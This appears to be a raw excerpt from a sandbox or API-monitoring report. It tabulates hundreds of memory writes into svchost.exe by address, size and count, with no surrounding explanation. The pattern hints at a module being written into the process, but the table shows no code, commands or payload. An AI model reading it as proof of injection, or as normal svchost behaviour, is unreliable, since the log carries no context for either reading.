| Write | svchost.exe | address = 0x100550e0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100550e4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 20 |
|
9 | |
| Write | svchost.exe | address = 0x100550e8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100550ec, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100550f0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 17 |
|
13 | |
| Write | svchost.exe | address = 0x100550f4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100550f8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100550fc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055100, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055104, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 19 |
|
4 | |
| Write | svchost.exe | address = 0x10055108, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005510c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055110, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055114, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055118, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005511c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055120, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055124, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055128, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005512c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 24 |
|
11 | |
| Write | svchost.exe | address = 0x10055130, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 23 |
|
3 | |
| Write | svchost.exe | address = 0x10055134, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 16 |
|
24 | |
| Write | svchost.exe | address = 0x10055138, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005513c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055140, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055144, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055148, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 9 |
|
11 | |
| Write | svchost.exe | address = 0x1005514c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055150, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055154, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055158, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005515c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055160, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055164, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055168, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005516c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055170, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055174, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 6 |
|
1 | |
| Write | svchost.exe | address = 0x10055178, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005517c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055180, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055184, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055188, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005518c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 25 |
|
3 | |
| Write | svchost.exe | address = 0x10055190, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 28 |
|
2 | |
| Write | svchost.exe | address = 0x10055194, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055198, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005519c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551a0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551a4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551a8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551ac, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551b4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551b8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551bc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551c0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551c4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551c8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551cc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551d0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551d4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551d8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551dc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551e0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551e4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551e8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551ec, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551f0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551f4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100551f8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 11 |
|
2 | |
| Write | svchost.exe | address = 0x100551fc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 29 |
|
2 | |
| Write | svchost.exe | address = 0x10055200, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055204, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055208, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005520c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055210, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055214, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055218, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005521c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055220, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055224, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055228, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005522c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055230, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055234, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 38 |
|
1 | |
| Write | svchost.exe | address = 0x10055238, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005523c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055240, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055244, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 8 |
|
7 | |
| Write | svchost.exe | address = 0x10055248, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005524c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055250, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055254, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055258, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005525c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055260, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055264, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055268, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 7 |
|
7 | |
| Write | svchost.exe | address = 0x1005526c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055270, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055274, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055278, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552cc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055000, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055004, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055008, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005500c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055010, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055014, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055018, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005501c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055020, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055024, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055028, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005502c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 53 |
|
1 | |
| Write | svchost.exe | address = 0x10055030, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055034, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055038, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005503c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055040, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055044, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055048, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005504c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055050, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055054, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055058, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005505c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055060, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055064, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055068, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005506c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055070, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055074, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005531c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552d4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552dc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552e0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552e4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552e8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552ec, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552f0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552f4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552f8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552fc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055300, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055304, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055308, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005530c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055310, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055314, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055288, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005528c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055290, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055294, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055298, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005529c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055324, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055328, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005532c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055330, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055334, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055338, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005533c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055340, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055344, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055348, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005534c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055350, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005507c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055080, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 30 |
|
2 | |
| Write | svchost.exe | address = 0x10055084, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 27 |
|
3 | |
| Write | svchost.exe | address = 0x10055088, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1005508c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055090, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055094, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055098, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 34 |
|
2 | |
| Write | svchost.exe | address = 0x1005509c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100550a0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100550a4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100550a8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100550ac, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100550b0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552a4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552a8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552ac, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552b0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552b4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552b8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552bc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552c0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100552c4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10055280, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0xe0000, size = 1024 |
|
2 | |
| Write | svchost.exe | address = 0x200000, size = 388 |
|
1 | |
| Write | svchost.exe | address = 0x210000, size = 40 |
|
1 | |
| Write | svchost.exe | address = 0xe0000, size = 5 |
|
2 | |
| Write | svchost.exe | address = 0x230000, size = 132460 |
|
1 | |
| Write | svchost.exe | address = 0x210000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x5c0000, size = 128 |
|
3 | |
| Write | svchost.exe | address = 0x5e0000, size = 44 |
|
3 | |
| Write | svchost.exe | address = 0x230000, size = 85256 |
|
1 | |
| Write | svchost.exe | address = 0x250000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0xe0000, size = 6 |
|
1 | |
| Write | svchost.exe | address = 0x230000, size = 747 |
|
1 | |
| Write | svchost.exe | address = 0x240000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x50000, size = 367 |
|
1 | |
| Write | svchost.exe | address = 0x60000, size = 112 |
|
62 | |
| Write | svchost.exe | address = 0x602104, size = 12 |
|
1 | |
| Write | svchost.exe | address = 0x10000000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x10001000, size = 822784 |
|
2 | |
| Write | svchost.exe | address = 0x100ca000, size = 145920 |
|
2 | |
| Write | svchost.exe | address = 0x100ee000, size = 117248 |
|
1 | |
| Write | svchost.exe | address = 0x1010e000, size = 512 |
|
2 | |
| Write | svchost.exe | address = 0x1010f000, size = 1024 |
|
2 | |
| Write | svchost.exe | address = 0x10110000, size = 512 |
|
2 | |
| Write | svchost.exe | address = 0x10111000, size = 29696 |
|
2 | |
| Write | svchost.exe | address = 0x20000, size = 26 |
|
3 | |
| Write | svchost.exe | address = 0xe0000, size = 12 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 19 |
|
6 | |
| Write | svchost.exe | address = 0xe0000, size = 16 |
|
57 | |
| Write | svchost.exe | address = 0x100ca088, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca08c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 16 |
|
3 | |
| Write | svchost.exe | address = 0x100ca090, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 13 |
|
7 | |
| Write | svchost.exe | address = 0x100ca094, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 9 |
|
3 | |
| Write | svchost.exe | address = 0x100ca098, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 20 |
|
5 | |
| Write | svchost.exe | address = 0x100ca09c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0a0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 15 |
|
3 | |
| Write | svchost.exe | address = 0x100ca0a4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 18 |
|
3 | |
| Write | svchost.exe | address = 0x100ca0a8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0ac, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 21 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0b0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0b4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0b8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 12 |
|
10 | |
| Write | svchost.exe | address = 0x100ca0bc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 22 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0c0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 14 |
|
4 | |
| Write | svchost.exe | address = 0x100ca0c4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0c8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0cc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0d0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0d4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 10 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0d8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0dc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0e0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 11 |
|
3 | |
| Write | svchost.exe | address = 0x100ca0e4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0e8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0ec, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0f0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0f4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0f8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca0fc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca100, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca104, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 24 |
|
2 | |
| Write | svchost.exe | address = 0x100ca108, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca10c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca110, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca114, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca118, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca11c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca120, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 17 |
|
3 | |
| Write | svchost.exe | address = 0x100ca124, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca128, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca12c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca130, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca134, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca138, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca13c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca140, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca144, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 25 |
|
1 | |
| Write | svchost.exe | address = 0x100ca148, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 28 |
|
1 | |
| Write | svchost.exe | address = 0x100ca14c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca150, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca154, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca158, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca15c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca160, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca164, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100ca168, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0xe0000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x360000, size = 388 |
|
1 | |
| Write | svchost.exe | address = 0x470000, size = 40 |
|
1 | |
| Write | svchost.exe | address = 0xe0000, size = 6 |
|
1 | |
| Write | svchost.exe | address = 0x470000, size = 747 |
|
1 | |
| Write | svchost.exe | address = 0x510000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x520000, size = 128 |
|
1 | |
| Write | svchost.exe | address = 0x540000, size = 44 |
|
1 | |
| Write | svchost.exe | address = 0x50000, size = 367 |
|
1 | |
| Write | svchost.exe | address = 0x60000, size = 112 |
|
64 | |
| Write | svchost.exe | address = 0x602104, size = 12 |
|
1 | |
| Write | svchost.exe | address = 0x10000000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x10001000, size = 9216 |
|
2 | |
| Write | svchost.exe | address = 0x10004000, size = 7168 |
|
2 | |
| Write | svchost.exe | address = 0x10006000, size = 1036 |
|
1 | |
| Write | svchost.exe | address = 0x10006000, size = 512 |
|
1 | |
| Write | svchost.exe | address = 0x10007000, size = 1024 |
|
2 | |
| Write | svchost.exe | address = 0x20000, size = 22 |
|
3 | |
| Write | svchost.exe | address = 0x70000, size = 12 |
|
7 | |
| Write | svchost.exe | address = 0x20000, size = 16 |
|
8 | |
| Write | svchost.exe | address = 0x100040ec, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 26 |
|
4 | |
| Write | svchost.exe | address = 0x10004000, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 24 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 17 |
|
6 | |
| Write | svchost.exe | address = 0x70000, size = 16 |
|
50 | |
| Write | svchost.exe | address = 0x100040d0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040d4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040d8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 14 |
|
3 | |
| Write | svchost.exe | address = 0x100040dc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 20 |
|
6 | |
| Write | svchost.exe | address = 0x100040e0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040e4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 12 |
|
2 | |
| Write | svchost.exe | address = 0x10004008, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000400c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 13 |
|
3 | |
| Write | svchost.exe | address = 0x10004010, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004014, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 9 |
|
6 | |
| Write | svchost.exe | address = 0x10004018, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000401c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004020, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004024, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 15 |
|
6 | |
| Write | svchost.exe | address = 0x10004028, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 19 |
|
1 | |
| Write | svchost.exe | address = 0x1000402c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004030, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 11 |
|
4 | |
| Write | svchost.exe | address = 0x10004034, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004038, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000403c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004040, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004044, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004048, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 10 |
|
3 | |
| Write | svchost.exe | address = 0x1000404c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004050, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004054, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004058, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000405c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004060, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004064, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 21 |
|
3 | |
| Write | svchost.exe | address = 0x10004068, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000406c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004070, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004074, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004078, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000407c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004080, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 25 |
|
2 | |
| Write | svchost.exe | address = 0x10004084, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004088, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000408c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004090, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 6 |
|
1 | |
| Write | svchost.exe | address = 0x10004094, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004098, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040c4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040c8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040f4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 18 |
|
1 | |
| Write | svchost.exe | address = 0x100040f8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040fc, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004100, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004104, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040a0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040a4, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x100040a8, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x70000, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x250000, size = 747 |
|
1 | |
| Write | svchost.exe | address = 0x260000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x480000, size = 128 |
|
1 | |
| Write | svchost.exe | address = 0x4a0000, size = 44 |
|
1 | |
| Write | svchost.exe | address = 0x50000, size = 367 |
|
1 | |
| Write | svchost.exe | address = 0x60000, size = 112 |
|
50 | |
| Write | svchost.exe | address = 0x602104, size = 12 |
|
1 | |
| Write | svchost.exe | address = 0x10000000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x10001000, size = 11264 |
|
2 | |
| Write | svchost.exe | address = 0x10004000, size = 4608 |
|
2 | |
| Write | svchost.exe | address = 0x10006000, size = 1036 |
|
1 | |
| Write | svchost.exe | address = 0x10006000, size = 512 |
|
1 | |
| Write | svchost.exe | address = 0x10007000, size = 1024 |
|
2 | |
| Write | svchost.exe | address = 0x20000, size = 22 |
|
3 | |
| Write | svchost.exe | address = 0xe0000, size = 12 |
|
7 | |
| Write | svchost.exe | address = 0x20000, size = 16 |
|
4 | |
| Write | svchost.exe | address = 0x100040a0, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 26 |
|
4 | |
| Write | svchost.exe | address = 0x10004000, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 24 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 17 |
|
5 | |
| Write | svchost.exe | address = 0xe0000, size = 16 |
|
36 | |
| Write | svchost.exe | address = 0x10004084, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004088, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x1000408c, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x10004090, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 14 |
|
2 | |
| Write | svchost.exe | address = 0x10004094, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 20 |
|
6 | |
| Write | svchost.exe | address = 0x10004098, size = 4 |
|
1 | |
| Write | svchost.exe | address = 0x20000, size = 6 |
|
1 | |
